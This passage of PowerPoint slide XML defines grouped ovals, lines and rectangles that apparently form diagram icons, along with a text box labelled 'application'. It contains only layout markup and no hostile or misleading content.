                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A63441EC-100E-6A4A-BFB8-C618B955A20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7" name="Line 151">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D092E08-26CC-C84F-90D6-808E4C87EC7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48" name="Group 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{445CB35D-9312-494D-BEFA-34936FCC8231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="11051208" y="2784761"/>
            <a:ext cx="500062" cy="233363"/>
            <a:chOff x="3600" y="219"/>
            <a:chExt cx="360" cy="175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849049" name="Oval 153">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E78073B4-CEE2-AA41-91B9-706E9CE7B0D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0" name="Line 154">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB59682-771F-1145-9BD9-602562EE0C80}"/>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1" name="Line 155">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{493F7A97-9DC0-4041-B001-63C1C89E3A1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2" name="Rectangle 156">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F33D9432-27C2-7D4B-9F51-CED272A03A25}"/>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53" name="Oval 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96D8343A-D20D-DF43-9D8C-9614F12EA01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54" name="Group 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF72F7D8-0926-E641-BF89-B78549526F5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3686" y="244"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849055" name="Line 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B8E91F-1808-A646-B2AC-2C54C857044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6" name="Line 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC2AA2BF-97CA-9F4F-BF19-4AB1EB23343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7" name="Line 161">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B988BE0-711E-CE46-A20C-0CDB3D96C7C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58" name="Group 162">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{376DA0B1-DC50-C248-B3A8-2732AF4837F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3686" y="243"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849059" name="Line 163">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7268DD4C-E72F-A74B-8E5C-51B7FDB4288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0" name="Line 164">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{510A02DB-C0C8-9445-8CC4-C91282ED22E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1" name="Line 165">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E51D4832-B54C-2240-97E4-868CF9ED5E6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62" name="Group 166">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33F3B9C4-9D01-8F4B-9C14-D9253E4AD675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10857533" y="3681698"/>
            <a:ext cx="501650" cy="233362"/>
            <a:chOff x="3600" y="219"/>
            <a:chExt cx="360" cy="175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849063" name="Oval 167">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFDA4978-4E16-D945-80E6-E031AA3E27D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4" name="Line 168">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A29CDEEF-E33C-564B-87E2-E8DECFF81861}"/>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5" name="Line 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7974035E-1C49-B24F-A8D5-3B25032BD974}"/>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6" name="Rectangle 170">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C542924-AABB-264C-B221-C779A6FC5EA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67" name="Oval 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{844B8CAA-EDBB-A64A-AA97-B9B04C23250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68" name="Group 172">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8154D048-B3BC-874F-BA5A-0A2E2A4331C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3686" y="244"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849069" name="Line 173">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B9F4B80-AA89-1D4B-A27E-6990C3E81F7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0" name="Line 174">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1633B114-AAFD-5C4D-B411-EAC7A5DF604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1" name="Line 175">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{943B1356-85C8-F54B-8BF4-4FB81E44728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72" name="Group 176">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19C18E09-E0C3-A340-82B7-FED1CBAA6AC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3686" y="243"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849073" name="Line 177">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EC727AF-EE65-4C48-A204-3D9AA24F27C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4" name="Line 178">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{321B2550-C845-A945-A197-D3DDFF768790}"/>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5" name="Line 179">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D9DC4A3-7C2D-1D48-8C97-24DDD171A57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76" name="Group 180">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7825497C-350D-F346-845B-3758CBCA5BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10524158" y="4265898"/>
            <a:ext cx="501650" cy="234950"/>
            <a:chOff x="3600" y="219"/>
            <a:chExt cx="360" cy="175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849077" name="Oval 181">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D368C5B5-75ED-5141-A016-5D772C587C9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8" name="Line 182">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87B2EFAD-0424-1C4E-992C-D35A23EF1CD2}"/>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9" name="Line 183">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D44689B3-BA9A-554B-835B-C4DAB5136E5F}"/>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0" name="Rectangle 184">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E2C5419-09ED-A149-B21D-40BD52ABA9BC}"/>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81" name="Oval 185">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C94A256-FC8D-664A-AA7F-66F6A6C4DD2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82" name="Group 186">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB7B758E-3D79-1641-B020-4C8DA7FBF7CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3686" y="244"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849083" name="Line 187">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F94D6DA8-BE17-FA41-870B-651AFDE7CEB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4" name="Line 188">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB21C249-7745-BB42-BE01-037A2826E02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5" name="Line 189">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A87D9B4-442D-2B49-B23F-5CB1D5A1471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86" name="Group 190">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF40A354-433B-AA46-A2FA-369A49A9DF0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3686" y="243"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849087" name="Line 191">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{908F8A4B-653C-824D-9FF9-BB3D8572C35D}"/>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8" name="Line 192">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0042BE8C-BEE9-414A-BA38-862554761AC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9" name="Line 193">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AED1AD4D-2789-A045-8DE6-F499F26B72B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90" name="Group 194">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7D81181-1A6D-A745-A7C5-1FD84CD0C1F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9914558" y="4754848"/>
            <a:ext cx="500062" cy="233362"/>
            <a:chOff x="3600" y="219"/>
            <a:chExt cx="360" cy="175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849091" name="Oval 195">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D2BBA8F-3A15-0648-9BD7-7DA9A3D9988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2" name="Line 196">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86910B90-B0C8-9A42-837F-A59A30D935B2}"/>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3" name="Line 197">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{753116BE-759F-3248-89E5-088C755A7928}"/>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4" name="Rectangle 198">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F040F6D-8365-4445-A998-A9AB661807D6}"/>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95" name="Oval 199">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99E016D4-DB3E-1F44-B0BA-00C67F9C9F4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96" name="Group 200">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51E7B728-3657-014F-BE83-947928CC9A87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3686" y="244"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849097" name="Line 201">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{937D0794-0D9F-764B-A226-6AD93BBBDA75}"/>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8" name="Line 202">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7CA01E-6D89-9442-A0C1-5AD22E88601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9" name="Line 203">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43F2F2EB-A4F4-3F4E-8101-AA08C3842EF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00" name="Group 204">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{547756EC-9D4E-1D44-89C0-7D9187D1CBEB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3686" y="243"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849101" name="Line 205">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A60A8E1F-F998-F647-8F96-22A9B64FC1C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2" name="Line 206">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C76936-3FC6-FF41-8BF4-928430D4050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3" name="Line 207">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9255F311-3A4C-5341-A945-177941FAA75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104" name="Group 208">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{696CFDC0-51DF-9F4B-8010-BC1191F54E2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9111283" y="4378611"/>
            <a:ext cx="501650" cy="233363"/>
            <a:chOff x="3600" y="219"/>
            <a:chExt cx="360" cy="175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849105" name="Oval 209">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D4B842A-8D2A-2545-AE0A-F0983DCA4A5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6" name="Line 210">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A608AF-9669-4A4D-AFA3-69E6DB697E48}"/>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7" name="Line 211">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F0EE423-095F-AF43-A42F-8549AC906D70}"/>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8" name="Rectangle 212">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF92E7D-D5FB-5641-8589-4741C6D5EF1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109" name="Oval 213">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8361395C-2560-1D41-9956-6AE90AC515C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110" name="Group 214">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D3FBC9-4C17-C64A-BDFE-28241190C71E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3686" y="244"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849111" name="Line 215">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2A2EB0E-F0C0-3649-9B93-855817F21D0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2" name="Line 216">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F7D3A84-6142-A344-8447-E84EA66D84D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3" name="Line 217">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A89073B5-60D3-A948-A2F7-AD443E8E5CA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14" name="Group 218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{845F13E9-1A07-EB40-9E2F-271CB4A06424}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3686" y="243"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849115" name="Line 219">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A692C9B-DED6-984C-9FC1-226A319A3D6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6" name="Line 220">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2738CE09-3C89-D745-AFD6-EA98BCB41A0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7" name="Line 221">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97190B9F-A667-E74B-9E6F-BAB39633C2F8}"/>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49118" name="Line 222">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9999395-B3C1-DB47-8306-A2A99AEEA1ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="9366870" y="4591335"/>
            <a:ext cx="1588" cy="249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119" name="Group 223">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D64505D8-1E24-EA40-BEDD-1F29658D29EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7820645" y="1925924"/>
            <a:ext cx="814388" cy="854075"/>
            <a:chOff x="4180" y="744"/>
            <a:chExt cx="513" cy="538"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849120" name="Rectangle 224">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{276539AA-D908-4D4D-9EDF-DB28A49606F0}"/>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1" name="Rectangle 225">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F36718-0FD4-7F40-9093-250D70D24DCC}"/>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2" name="Rectangle 226">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4AAAF18-E578-8643-AD88-A21D58066600}"/>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3" name="Text Box 227">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5FEDE72-A005-B541-9EAF-C34A1D1B68EC}"/>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latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>application</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1000">
                  <a:solidFill>
